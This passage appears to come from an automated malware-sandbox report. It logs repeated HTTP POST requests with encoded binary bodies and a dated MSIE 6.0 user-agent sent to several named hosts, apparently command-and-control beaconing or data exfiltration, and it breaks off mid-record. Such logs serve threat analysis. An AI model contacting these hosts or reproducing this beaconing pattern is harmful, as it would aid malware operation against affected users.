V8ZJBnJ6TJemLy85pZc8WXX0vatCx5q2xi+pQRDeXTwxf62w5f4YNdYB0N9EeV7iqMokcFFiLzEy+jFRM+WvoyqRu/zuZRseQgRO0uVsucwKe9wensD6UdaB8/y57ZzAtjVR1ke45qsx4sMsZwSbmLRG4RD0Gx9n+whJCsBGx3kbdMIEQD40n5RZIa9V8twf3nb9raRHzL3HKXGu//OXL6UB0ljVlunSzwh9CjsD2+8UHWpoHvCs7coNxdBEfSgGKjcL/IvuF6dWTI2b1ZGsaswb2QBxP8OVs/rVj/78uNhpWqjTUDMAhRkQb+uQHxuvlP8wKJ4uJ8dB2nv+MOJZ8vA41jjLDjoUnCFqIiK18ib1excHEY0DGFwq+xWBonLUf4KPHkOUcSgTjtaCO1ATgrA46u7CzcP1aB+qmb8vAPZSqsbvshyU4cbcukdvVb7Aln/5xPWEAh/ob1yVbLe6J9qJBcMeeq2mbJfWcV4L7y76jPxAKE4+Cy0mJplYUQtSJRWUk3nb2lqcNopPWstlu+mz4cyh9g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 64 31 75 37 42 64 4e 31 54 4a 64 6c 41 33 54 33 6d 67 48 65 34 33 7a 48 53 56 36 35 6f 42 4b 30 74 39 42 55 64 77 78 39 61 78 61 61 77 73 63 43 50 4e 6b 46 48 33 6d 2b 63 6c 62 59 53 70 75 77 4a 32 6c 57 62 46 4d 76 36 4b 6a 47 32 76 61 6e 39 35 62 73 4a 79 61 67 75 4e 45 66 73 4c 42 30 6d 58 71 46 72 74 64 6b 34 4c 66 34 4f 66 32 36 74 2b 67 34 38 59 66 7a 38 49 56 33 54 6a 2f 72 70 38 51 74 77 37 33 75 5a 67 75 47 63 4a 7a 63 2f 53 72 70 4e 46 41 77 7a 7a 59 62 4b 49 4e 55 2b 59 68 49 69 35 43 4e 71 68 2b 61 35 48 35 77 70 41 33 75 34 75 6b 77 69 62 66 69 35 4e 52 76 7a 35 4f 6d 53 41 50 33 4b 5a 6d 5a 49 74 62 47 41 52 7a 78 39 46 61 39 4a 2f 34 4d 78 76 44 6b 6f 2f 41 39 6c 68 6b 62 62 34 33 2b 51 69 43 68 2f 52 30 4d 2f 75 48 78 51 56 70 61 37 66 4c 48 57 34 61 32 31 32 55 76 6f 59 49 6b 44 6b 45 63 38 41 51 6b 4b 46 75 6c 5a 69 66 74 53 71 42 6c 4d 65 51 67 42 30 43 58 33 51 63 59 35 43 46 4f 32 53 36 74 31 42 4b 35 31 6d 59 67 6c 78 4d 48 69 2f 39 34 66 53 2f 52 75 35 6a 36 52 7a 68 48 71 68 34 43 6a 54 66 6e 70 67 79 2b 49 6e 7a 6d 30 6c 6c 65 36 52 51 50 7a 32 41 68 70 6b 37 71 69 73 44 33 68 66 6a 48 75 44 50 79 77 62 79 32 51 41 49 50 6d 2b 45 57 2b 63 56 72 71 79 69 46 54 62 78 39 37 4e 74 48 57 73 71 78 7a 54 66 73 68 36 43 47 6a 5a 73 41 57 33 79 37 55 37 68 6c 79 44 76 55 58 79 52 4a 4f 41 55 35 4f 43 46 6a 73 62 61 45 39 70 43 63 2f 63 35 63 46 49 73 68 66 52 32 56 6e 4b 54 70 48 65 6e 4a 49 5a 4c 55 39 47 49 7a 34 35 48 2b 35 54 35 63 37 38 54 44 47 70 7a 4e 4d 33 4f 57 4e 47 6e 68 48 65 4c 42 7a 2f 36 2f 6d 78 44 54 46 33 6a 6e 70 4e 34 6b 65 58 73 71 30 57 79 4b 65 6c 65 65 36 64 4a 79 37 47 72 33 32 5a 6c 6d 4d 71 31 79 64 39 33 35 50 44 38 56 77 66 66 62 Data Ascii: d1u7BdN1TJdlA3T3mgHe43zHSV65oBK0t9BUdwx9axaawscCPNkFH3m+clbYSpuwJ2lWbFMv6KjG2van95bsJyaguNEfsLB0mXqFrtdk4Lf4Of26t+g48Yfz8IV3Tj/rp8Qtw73uZguGcJzc/SrpNFAwzzYbKINU+YhIi5CNqh+a5H5wpA3u4ukwibfi5NRvz5OmSAP3KZmZItbGARzx9Fa9J/4MxvDko/A9lhkbb43+QiCh/R0M/uHxQVpa7fLHW4a212UvoYIkDkEc8AQkKFulZiftSqBlMeQgB0CX3QcY5CFO2S6t1BK51mYglxMHi/94fS/Ru5j6RzhHqh4CjTfnpgy+Inzm0lle6RQPz2Ahpk7qisD3hfjHuDPywby2QAIPm+EW+cVrqyiFTbx97NtHWsqxzTfsh6CGjZsAW3y7U7hlyDvUXyRJOAU5OCFjsbaE9pCc/c5cFIshfR2VnKTpHenJIZLU9GIz45H+5T5c78TDGpzNM3OWNGnhHeLBz/6/mxDTF3jnpN4keXsq0WyKelee6dJy7Gr32ZlmMq1yd935PD8Vwffb
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.item-pr.comCache-Control: no-cacheData Raw: 7a 75 45 46 6d 2f 50 36 6c 70 53 71 6a 68 47 76 4f 6f 50 52 63 5a 77 6c 55 31 74 5a 37 4d 58 66 31 78 2f 4a 4f 4a 69 43 46 69 64 6e 4f 6a 51 57 70 56 74 2f 51 74 68 76 71 65 50 50 65 5a 35 2b 51 4a 48 2b 2b 31 63 55 2b 56 4b 4a 72 49 38 61 43 33 2b 4f 4a 71 67 66 49 47 50 79 42 53 4d 2f 38 6f 2f 7a 78 34 6d 44 57 59 70 6e 39 32 39 6a 47 66 79 6f 6c 34 33 75 44 47 30 47 35 6d 6e 74 49 42 57 56 48 66 30 4f 35 39 79 62 42 33 51 45 45 36 46 6b 71 6c 37 43 33 38 33 50 38 5a 6c 30 78 34 34 6b 56 6f 35 68 6b 36 37 51 4b 65 37 73 5a 38 7a 74 42 79 43 69 5a 2b 58 34 63 47 74 6a 7a 67 2b 79 57 4a 39 68 71 7a 4f 79 56 6d 42 55 6e 37 68 2f 37 72 4b 62 33 46 79 39 33 63 62 59 74 7a 4f 55 7a 6b 45 6d 39 4c 78 7a 57 4c 34 6a 35 45 48 4c 64 78 72 31 68 35 50 32 35 36 4c 43 7a 72 73 53 33 55 30 2b 4f 2b 4c 35 46 6a 6b 74 65 53 65 2f 63 6d 37 4d 58 79 48 4f 74 37 73 70 37 32 65 47 61 4e 58 2f 69 74 48 72 4e 75 33 47 74 5a 46 4c 6e 6e 50 69 6d 42 37 42 7a 59 56 6b 34 4f 71 7a 54 66 38 36 6f 76 71 71 6f 72 56 73 50 55 49 73 6c 4a 6c 7a 47 4e 4d 31 47 69 56 77 46 4a 44 63 39 42 4c 50 47 53 4c 30 70 57 50 55 50 68 72 69 58 63 75 39 65 41 69 66 30 50 57 6c 62 5a 6e 66 76 53 6e 76 33 62 67 68 50 30 45 37 4b 62 34 5a 43 42 54 47 31 65 66 44 38 56 70 59 63 76 35 6f 66 58 39 31 66 58 70 75 71 32 46 4a 61 58 43 6b 53 78 4e 7a 6c 73 6e 69 77 4c 74 6c 37 76 42 68 44 6b 35 4b 76 37 64 67 47 71 69 71 67 67 74 30 56 6f 41 49 55 67 46 2b 48 73 67 33 62 41 41 41 55 64 67 46 6a 32 4b 4b 6d 36 4d 49 72 35 6b 75 65 5a 66 6f 55 50 75 73 7a 55 50 66 6f 51 78 47 68 43 49 63 68 4b 61 59 4a 67 71 6a 46 2b 5a 30 42 4c 37 38 74 48 41 6f 4c 72 55 54 6d 30 35 54 41 59 67 38 67 55 31 33 2b 65 2b 48 42 52 65 31 51 41 75 47 74 34 6d 58 73 56 6c 77 59 7a 32 49 76 46 45 67 57 77 3d 3d Data Ascii: zuEFm/P6lpSqjhGvOoPRcZwlU1tZ7MXf1x/JOJiCFidnOjQWpVt/QthvqePPeZ5+QJH++1cU+VKJrI8aC3+OJqgfIGPyBSM/8o/zx4mDWYpn929jGfyol43uDG0G5mntIBWVHf0O59ybB3QEE6Fkql7C383P8Zl0x44kVo5hk67QKe7sZ8ztByCiZ+X4cGtjzg+yWJ9hqzOyVmBUn7h/7rKb3Fy93cbYtzOUzkEm9LxzWL4j5EHLdxr1h5P256LCzrsS3U0+O+L5FjkteSe/cm7MXyHOt7sp72eGaNX/itHrNu3GtZFLnnPimB7BzYVk4OqzTf86ovqqorVsPUIslJlzGNM1GiVwFJDc9BLPGSL0pWPUPhriXcu9eAif0PWlbZnfvSnv3bghP0E7Kb4ZCBTG1efD8VpYcv5ofX91fXpuq2FJaXCkSxNzlsniwLtl7vBhDk5Kv7dgGqiqggt0VoAIUgF+Hsg3bAAAUdgFj2KKm6MIr5kueZfoUPuszUPfoQxGhCIchKaYJgqjF+Z0BL78tHAoLrUTm05TAYg8gU13+e+HBRe1QAuGt4mXsVlwYz2IvFEgWw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 4f 41 58 44 39 33 79 78 51 35 64 42 74 53 62 63 4a 31 36 79 4f 41 2f 6d 36 47 30 55 64 48 37 68 63 42 6f 54 72 66 34 2f 61 62 35 72 31 65 5a 4c 56 59 76 48 36 33 55 76 39 69 79 35 74 4f 31 73 72 6b 65 77 59 62 2b 74 65 2f 57 73 74 4a 37 79 5a 55 61 44 74 56 49 56 63 74 45 2b 66 6b 6d 50 31 53 67 38 4e 67 6d 5a 67 6f 37 33 50 71 77 31 49 39 2b 6f 65 62 55 2b 55 70 64 67 6c 37 76 71 39 79 47 54 2f 47 32 59 31 6c 58 46 6a 30 6f 4d 57 4f 67 78 6e 76 43 59 64 76 7a 44 56 55 58 57 43 42 59 39 56 62 51 42 68 48 53 33 31 59 49 36 75 62 69 67 4c 55 36 7a 72 6b 4e 66 66 2f 31 73 69 79 62 42 68 73 50 51 63 44 47 32 49 32 6e 68 44 33 61 57 6b 48 42 67 79 71 77 6d 73 66 61 4b 6e 30 47 46 65 69 43 32 6a 6b 44 64 4f 4f 46 6d 78 69 39 75 45 66 41 41 71 75 57 44 6a 74 34 2f 51 35 67 56 6a 58 68 6e 51 4f 47 75 6f 4e 4a 38 5a 61 72 48 4e 32 52 54 45 65 34 7a 62 41 39 6c 58 70 72 4e 44 4e 6c 51 34 41 2f 4c 49 4a 2b 7a 2b 76 53 38 7a 4d 67 51 31 4f 62 56 4b 6d 41 36 2f 41 58 4c 47 48 41 6f 73 35 4f 56 64 30 36 63 69 35 52 47 65 30 65 64 35 7a 34 77 79 79 70 37 2f 49 57 46 6c 74 39 67 39 68 59 6f 6b 4a 4c 6a 42 65 4c 79 77 4e 35 4b 4f 59 41 5a 54 41 56 6c 4e 74 51 59 47 51 59 69 69 79 6f 43 73 44 33 67 4b 44 64 63 5a 71 58 73 54 34 6a 6e 66 66 2f 71 75 51 79 4b 78 48 4a 76 31 39 67 6f 68 51 62 73 31 70 31 37 33 49 2b 6b 51 73 33 6b 51 56 4b 30 6c 61 78 39 49 54 45 77 41 4e 53 2f 56 55 57 6b 6b 68 51 78 78 47 73 42 79 2b 31 6b 30 31 71 32 68 42 36 66 50 46 77 50 63 4e 47 74 6c 61 51 51 2f 37 47 56 49 64 42 46 6c 77 37 45 4c 38 54 72 44 65 4a 76 6e 5a 44 4a 5a 68 71 44 55 5a 4d 51 4e 66 50 51 72 70 72 37 30 79 4f 7a 46 46 75 4f 74 41 33 54 55 6c 69 75 63 77 3d 3d Data Ascii: OAXD93yxQ5dBtSbcJ16yOA/m6G0UdH7hcBoTrf4/ab5r1eZLVYvH63Uv9iy5tO1srkewYb+te/WstJ7yZUaDtVIVctE+fkmP1Sg8NgmZgo73Pqw1I9+oebU+Updgl7vq9yGT/G2Y1lXFj0oMWOgxnvCYdvzDVUXWCBY9VbQBhHS31YI6ubigLU6zrkNff/1siybBhsPQcDG2I2nhD3aWkHBgyqwmsfaKn0GFeiC2jkDdOOFmxi9uEfAAquWDjt4/Q5gVjXhnQOGuoNJ8ZarHN2RTEe4zbA9lXprNDNlQ4A/LIJ+z+vS8zMgQ1ObVKmA6/AXLGHAos5OVd06ci5RGe0ed5z4wyyp7/IWFlt9g9hYokJLjBeLywN5KOYAZTAVlNtQYGQYiiyoCsD3gKDdcZqXsT4jnff/quQyKxHJv19gohQbs1p173I+kQs3kQVK0lax9ITEwANS/VUWkkhQxxGsBy+1k01q2hB6fPFwPcNGtlaQQ/7GVIdBFlw7EL8TrDeJvnZDJZhqDUZMQNfPQrpr70yOzFFuOtA3TUliucw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 30 51 42 43 41 64 32 67 56 4a 65 33 50 5a 4f 75 46 43 78 6f 57 52 62 46 56 61 4f 4c 55 56 77 6d 59 58 2b 45 6a 45 6e 70 4a 75 51 48 30 50 4e 53 79 43 38 61 69 4e 66 58 33 50 41 71 71 43 69 38 79 44 53 30 72 5a 44 4b 78 54 76 6c 51 52 36 79 78 61 79 53 33 46 56 65 62 44 68 39 4e 75 73 41 47 77 61 55 65 72 37 42 36 70 43 6c 46 56 48 7a 73 4e 43 4a 52 61 4b 30 36 47 58 6e 67 48 4a 32 4f 70 57 43 61 6c 67 43 55 39 7a 7a 62 53 48 7a 72 70 56 77 6a 49 56 46 67 31 6b 42 70 50 35 4d 77 6c 63 6d 68 6a 2f 6b 65 36 53 4e 6c 79 50 53 62 7a 34 6f 55 63 41 37 54 57 42 2f 41 69 46 5a 31 58 35 61 4d 30 56 55 4a 57 47 76 35 34 4a 39 69 52 4b 4a 4a 6e 42 6d 2f 61 2b 42 32 55 5a 6e 2b 66 58 56 30 53 2b 64 35 41 63 44 69 70 31 5a 44 4d 55 45 71 50 42 56 68 43 66 4c 72 7a 69 71 67 6b 74 56 43 5a 2b 32 76 4b 4f 55 31 4e 59 4c 47 45 71 6b 35 43 78 4b 36 70 44 6a 74 34 35 6f 56 37 35 68 6b 6b 44 79 5a 2b 66 34 4e 62 50 37 4c 6d 45 49 36 4c 75 77 7a 49 53 55 55 50 6d 4c 79 66 4f 75 62 78 68 7a 49 4f 44 30 76 42 54 41 77 58 76 6d 44 42 31 6b 36 51 6c 31 39 75 74 73 74 2f 68 78 6c 6c 43 4e 6a 6e 33 2b 64 30 6c 6b 78 43 6f 2f 59 36 77 76 4d 52 75 65 45 6f 39 47 4c 4c 55 7a 6e 6d 69 4d 76 6b 49 4f 6a 47 52 34 76 71 41 4b 6d 68 63 41 4f 46 61 54 76 55 30 4c 6d 31 36 77 57 30 2b 71 4b 4d 39 65 4d 6e 31 41 54 30 39 59 44 44 4d 6d 7a 38 47 4e 2f 55 6e 4a 61 55 31 77 62 6f 73 4d 69 77 59 5a 48 79 51 35 44 52 72 67 56 59 4c 6d 30 68 44 68 6b 59 57 48 4c 59 4b 46 2b 65 59 78 52 75 41 65 74 59 74 39 34 52 34 5a 63 33 73 75 66 6b 43 54 52 65 54 34 6d 45 63 43 52 4e 4e 32 77 76 52 66 2b 37 48 72 64 4e 4b 39 4c 7a 37 6b 34 67 35 51 6b 6e 62 47 69 57 39 56 30 4c 42 31 39 6c 49 57 68 42 61 6e 4f 36 36 65 62 49 73 3d Data Ascii: 0QBCAd2gVJe3PZOuFCxoWRbFVaOLUVwmYX+EjEnpJuQH0PNSyC8aiNfX3PAqqCi8yDS0rZDKxTvlQR6yxayS3FVebDh9NusAGwaUer7B6pClFVHzsNCJRaK06GXngHJ2OpWCalgCU9zzbSHzrpVwjIVFg1kBpP5Mwlcmhj/ke6SNlyPSbz4oUcA7TWB/AiFZ1X5aM0VUJWGv54J9iRKJJnBm/a+B2UZn+fXV0S+d5AcDip1ZDMUEqPBVhCfLrziqgktVCZ+2vKOU1NYLGEqk5CxK6pDjt45oV75hkkDyZ+f4NbP7LmEI6LuwzISUUPmLyfOubxhzIOD0vBTAwXvmDB1k6Ql19utst/hxllCNjn3+d0lkxCo/Y6wvMRueEo9GLLUznmiMvkIOjGR4vqAKmhcAOFaTvU0Lm16wW0+qKM9eMn1AT09YDDMmz8GN/UnJaU1wbosMiwYZHyQ5DRrgVYLm0hDhkYWHLYKF+eYxRuAetYt94R4Zc3sufkCTReT4mEcCRNN2wvRf+7HrdNK9Lz7k4g5QknbGiW9V0LB19lIWhBanO66ebIs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 4f 41 58 44 39 33 79 78 51 35 64 42 74 53 62 63 4a 31 36 79 4f 41 2f 6d 36 47 30 55 64 48 37 68 63 42 6f 54 72 66 34 2f 61 62 35 72 31 65 5a 4c 56 59 76 48 36 33 55 76 39 69 79 35 74 4f 31 73 72 6b 65 77 59 62 2b 74 65 2f 57 73 74 4a 37 79 5a 55 61 44 74 56 49 56 63 74 45 2b 66 6b 6d 50 31 53 67 38 4e 67 6d 5a 67 6f 37 33 50 71 77 31 49 39 2b 6f 65 62 55 2b 55 70 64 67 6c 37 76 71 39 79 47 54 2f 47 32 59 31 6c 58 46 6a 30 6f 4d 57 4f 67 78 6e 76 43 59 64 76 7a 44 56 55 58 57 43 42 59 39 56 62 51 42 68 48 53 33 31 59 49 36 75 62 69 67 4c 55 36 7a 72 6b 4e 66 66 2f 31 73 69 79 62 42 68 73 50 51 63 44 47 32 49 32 6e 68 44 33 61 57 6b 48 42 67 79 71 77 6d 73 66 61 4b 6e 30 47 46 65 69 43 32 6a 6b 44 64 4f 4f 46 6d 78 69 39 75 45 66 41 41 71 75 57 44 6a 74 34 2f 51 35 67 56 6a 58 68 6e 51 4f 47 75 6f 4e 4a 38 5a 61 72 48 4e 32 52 54 45 65 34 7a 62 41 39 6c 58 70 72 4e 44 4e 6c 51 34 41 2f 4c 49 4a 2b 7a 2b 76 53 38 7a 4d 67 51 31 4f 62 56 4b 6d 41 36 2f 41 58 4c 47 48 41 6f 73 35 4f 56 64 30 36 63 69 35 52 47 65 30 65 64 35 7a 34 77 79 79 70 37 2f 49 57 46 6c 74 39 67 39 68 59 6f 6b 4a 4c 6a 42 65 4c 79 77 4e 35 4b 4f 59 41 5a 54 41 56 6c 4e 74 51 59 47 51 59 69 69 79 6f 43 73 44 33 67 4b 44 64 63 5a 71 58 73 54 34 6a 6e 66 66 2f 71 75 51 79 4b 78 48 4a 76 31 39 67 6f 68 51 62 73 31 70 31 37 33 49 2b 6b 51 73 33 6b 51 56 4b 30 6c 61 78 39 49 54 45 77 41 4e 53 2f 56 55 57 6b 6b 68 51 78 78 47 73 42 79 2b 31 6b 30 31 71 32 68 42 36 66 50 46 77 50 63 4e 47 74 6c 61 51 51 2f 37 47 56 49 64 42 46 6c 77 37 45 4c 38 54 72 44 65 4a 76 6e 5a 44 4a 5a 68 71 44 55 5a 4d 51 4e 66 50 51 72 70 72 37 30 79 4f 7a 46 46 75 4f 74 41 33 54 55 6c 69 75 63 77 3d 3d Data Ascii: OAXD93yxQ5dBtSbcJ16yOA/m6G0UdH7hcBoTrf4/ab5r1eZLVYvH63Uv9iy5tO1srkewYb+te/WstJ7yZUaDtVIVctE+fkmP1Sg8NgmZgo73Pqw1I9+oebU+Updgl7vq9yGT/G2Y1lXFj0oMWOgxnvCYdvzDVUXWCBY9VbQBhHS31YI6ubigLU6zrkNff/1siybBhsPQcDG2I2nhD3aWkHBgyqwmsfaKn0GFeiC2jkDdOOFmxi9uEfAAquWDjt4/Q5gVjXhnQOGuoNJ8ZarHN2RTEe4zbA9lXprNDNlQ4A/LIJ+z+vS8zMgQ1ObVKmA6/AXLGHAos5OVd06ci5RGe0ed5z4wyyp7/IWFlt9g9hYokJLjBeLywN5KOYAZTAVlNtQYGQYiiyoCsD3gKDdcZqXsT4jnff/quQyKxHJv19gohQbs1p173I+kQs3kQVK0lax9ITEwANS/VUWkkhQxxGsBy+1k01q2hB6fPFwPcNGtlaQQ/7GVIdBFlw7EL8TrDeJvnZDJZhqDUZMQNfPQrpr70yOzFFuOtA3TUliucw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 30 51 42 43 41 64 32 67 56 4a 65 33 50 5a 4f 75 46 43 78 6f 57 52 62 46 56 61 4f 4c 55 56 77 6d 59 58 2b 45 6a 45 6e 70 4a 75 51 48 30 50 4e 53 79 43 38 61 69 4e 66 58 33 50 41 71 71 43 69 38 79 44 53 30 72 5a 44 4b 78 54 76 6c 51 52 36 79 78 61 79 53 33 46 56 65 62 44 68 39 4e 75 73 41 47 77 61 55 65 72 37 42 36 70 43 6c 46 56 48 7a 73 4e 43 4a 52 61 4b 30 36 47 58 6e 67 48 4a 32 4f 70 57 43 61 6c 67 43 55 39 7a 7a 62 53 48 7a 72 70 56 77 6a 49 56 46 67 31 6b 42 70 50 35 4d 77 6c 63 6d 68 6a 2f 6b 65 36 53 4e 6c 79 50 53 62 7a 34 6f 55 63 41 37 54 57 42 2f 41 69 46 5a 31 58 35 61 4d 30 56 55 4a 57 47 76 35 34 4a 39 69 52 4b 4a 4a 6e 42 6d 2f 61 2b 42 32 55 5a 6e 2b 66 58 56 30 53 2b 64 35 41 63 44 69 70 31 5a 44 4d 55 45 71 50 42 56 68 43 66 4c 72 7a 69 71 67 6b 74 56 43 5a 2b 32 76 4b 4f 55 31 4e 59 4c 47 45 71 6b 35 43 78 4b 36 70 44 6a 74 34 35 6f 56 37 35 68 6b 6b 44 79 5a 2b 66 34 4e 62 50 37 4c 6d 45 49 36 4c 75 77 7a 49 53 55 55 50 6d 4c 79 66 4f 75 62 78 68 7a 49 4f 44 30 76 42 54 41 77 58 76 6d 44 42 31 6b 36 51 6c 31 39 75 74 73 74 2f 68 78 6c 6c 43 4e 6a 6e 33 2b 64 30 6c 6b 78 43 6f 2f 59 36 77 76 4d 52 75 65 45 6f 39 47 4c 4c 55 7a 6e 6d 69 4d 76 6b 49 4f 6a 47 52 34 76 71 41 4b 6d 68 63 41 4f 46 61 54 76 55 30 4c 6d 31 36 77 57 30 2b 71 4b 4d 39 65 4d 6e 31 41 54 30 39 59 44 44 4d 6d 7a 38 47 4e 2f 55 6e 4a 61 55 31 77 62 6f 73 4d 69 77 59 5a 48 79 51 35 44 52 72 67 56 59 4c 6d 30 68 44 68 6b 59 57 48 4c 59 4b 46 2b 65 59 78 52 75 41 65 74 59 74 39 34 52 34 5a 63 33 73 75 66 6b 43 54 52 65 54 34 6d 45 63 43 52 4e 4e 32 77 76 52 66 2b 37 48 72 64 4e 4b 39 4c 7a 37 6b 34 67 35 51 6b 6e 62 47 69 57 39 56 30 4c 42 31 39 6c 49 57 68 42 61 6e 4f 36 36 65 62 49 73 3d Data Ascii: 0QBCAd2gVJe3PZOuFCxoWRbFVaOLUVwmYX+EjEnpJuQH0PNSyC8aiNfX3PAqqCi8yDS0rZDKxTvlQR6yxayS3FVebDh9NusAGwaUer7B6pClFVHzsNCJRaK06GXngHJ2OpWCalgCU9zzbSHzrpVwjIVFg1kBpP5Mwlcmhj/ke6SNlyPSbz4oUcA7TWB/AiFZ1X5aM0VUJWGv54J9iRKJJnBm/a+B2UZn+fXV0S+d5AcDip1ZDMUEqPBVhCfLrziqgktVCZ+2vKOU1NYLGEqk5CxK6pDjt45oV75hkkDyZ+f4NbP7LmEI6LuwzISUUPmLyfOubxhzIOD0vBTAwXvmDB1k6Ql19utst/hxllCNjn3+d0lkxCo/Y6wvMRueEo9GLLUznmiMvkIOjGR4vqAKmhcAOFaTvU0Lm16wW0+qKM9eMn1AT09YDDMmz8GN/UnJaU1wbosMiwYZHyQ5DRrgVYLm0hDhkYWHLYKF+eYxRuAetYt94R4Zc3sufkCTReT4mEcCRNN2wvRf+7HrdNK9Lz7k4g5QknbGiW9V0LB19lIWhBanO66ebIs=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ka-mo-me.comCache-Control: no-cacheData Raw: 47 5a 79 75 65 44 76 68 52 35 64 6e 4e 71 2b 76 30 75 57 56 6a 53 51 50 6e 59 78 42 4e 45 49 38 6e 34 62 50 76 71 7a 6d 4d 44 7a 33 4c 2f 53 6d 64 6d 6e 67 44 57 43 49 6a 39 33 65 30 74 5a 52 57 41 57 4a 70 33 33 7a 73 45 63 41 64 49 4e 63 35 54 70 49 71 47 56 41 7a 57 5a 43 4a 46 53 49 4f 35 52 54 79 53 33 37 2f 34 72 35 6e 55 6b 4a 45 5a 71 32 58 49 59 49 58 37 6f 53 54 4d 59 6e 76 47 70 43 6a 4d 33 4e 63 66 74 6a 48 4d 2f 38 48 70 35 62 59 6e 66 2b 52 4b 39 65 50 73 2b 78 67 36 74 72 47 70 70 73 51 48 72 55 4b 69 58 2f 62 30 72 59 41 64 68 58 71 48 6d 62 73 7a 58 61 57 4a 4a 63 50 71 47 6d 2b 68 6d 59 65 5a 56 51 66 4c 30 2f 6b 33 4b 50 42 39 39 72 34 54 79 35 6c 33 66 79 37 51 79 53 37 64 43 6a 55 6e 31 57 6d 61 4e 61 62 4f 46 61 5a 32 38 59 39 2b 30 45 76 32 76 4d 33 69 7a 68 59 6d 48 30 61 4f 4e 46 78 47 2f 41 48 31 76 4a 47 39 4d 66 74 64 31 59 4b 68 61 51 69 59 64 65 4d 4d 57 4c 56 32 46 53 43 56 74 6c 4d 47 6b 51 49 74 4d 45 69 2b 74 52 74 76 62 79 4e 79 62 52 46 6c 63 4e 42 41 47 32 63 44 49 77 36 53 74 4d 4d 61 37 66 65 61 63 48 7a 6e 4c 52 51 68 47 51 48 32 6a 2f 6b 4e 61 6f 56 2f 5a 36 77 64 31 59 56 4f 4f 6b 49 6d 69 4c 48 4d 62 68 66 41 43 64 68 69 34 79 37 35 65 62 34 65 49 5a 71 71 4d 57 2f 45 71 59 46 56 48 72 49 64 58 6d 64 35 64 4d 4a 31 6b 37 6f 31 58 31 53 4e 75 48 4a 47 67 6d 43 48 5a 33 6f 34 34 68 2f 58 31 4c 44 70 57 71 64 47 6d 63 66 47 2f 4d 31 43 65 43 55 4b 55 70 2b 56 78 37 6c 79 75 72 49 42 56 4d 6a 54 33 43 6b 54 7a 39 41 76 2f 34 52 70 5a 48 36 38 56 6e 61 4c 76 74 58 5a 59 71 36 68 55 63 4d 44 67 44 39 52 34 50 78 79 41 63 6f 58 4d 62 78 6b 6c 54 54 48 70 32 71 33 73 77 Data Ascii: GZyueDvhR5dnNq+v0uWVjSQPnYxBNEI8n4bPvqzmMDz3L/SmdmngDWCIj93e0tZRWAWJp33zsEcAdINc5TpIqGVAzWZCJFSIO5RTyS37/4r5nUkJEZq2XIYIX7oSTMYnvGpCjM3NcftjHM/8Hp5bYnf+RK9ePs+xg6trGppsQHrUKiX/b0rYAdhXqHmbszXaWJJcPqGm+hmYeZVQfL0/k3KPB99r4Ty5l3fy7QyS7dCjUn1WmaNabOFaZ28Y9+0Ev2vM3izhYmH0aONFxG/AH1vJG9Mftd1YKhaQiYdeMMWLV2FSCVtlMGkQItMEi+tRtvbyNybRFlcNBAG2cDIw6StMMa7feacHznLRQhGQH2j/kNaoV/Z6wd1YVOOkImiLHMbhfACdhi4y75eb4eIZqqMW/EqYFVHrIdXmd5dMJ1k7o1X1SNuHJGgmCHZ3o44h/X1LDpWqdGmcfG/M1CeCUKUp+Vx7lyurIBVMjT3CkTz9Av/4RpZH68VnaLvtXZYq6hUcMDgD9R4PxyAcoXMbxklTTHp2q3sw
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.findbc.comCache-Control: no-cacheData Raw: 6f 42 71 74 74 32 71 4e 57 70 63 38 33 39 4a 43 54 56 32 36 7a 79 32 65 47 54 4b 61 41 55 45 38 50 72 62 34 71 31 43 47 6e 78 30 59 4f 73 65 66 56 30 44 48 37 31 4b 6c 39 61 72 37 6b 47 76 36 62 4a 5a 55 41 31 64 71 63 68 48 49 6d 63 6b 76 63 41 59 71 49 75 78 5a 4a 33 61 68 6f 30 30 64 68 6c 6a 69 34 54 4e 42 51 48 79 46 72 53 72 47 6a 45 53 78 68 4a 64 50 2b 75 58 2f 2b 46 65 78 36 31 5a 79 71 2b 33 63 76 49 6f 46 6f 59 6b 35 38 78 6c 47 69 66 39 6e 71 69 4e 50 74 44 69 47 74 48 65 6f 5a 32 31 4a 50 79 41 33 34 30 56 58 45 37 63 2b 63 44 39 78 6e 37 51 6b 4e 64 5a 4c 62 61 78 59 75 44 39 4b 72 78 58 31 64 66 6c 79 4d 46 7a 6a 2b 39 54 72 50 69 74 78 30 2b 70 78 53 38 30 71 69 41 68 68 69 54 51 4e 51 64 52 49 76 61 34 32 58 65 2b 6c 2b 44 47 4d 2b 39 7a 6e 55 6f 6a 6f 68 2b 76 54 6f 4b 32 52 5a 6d 43 62 55 58 4f 4d 74 4f 56 70 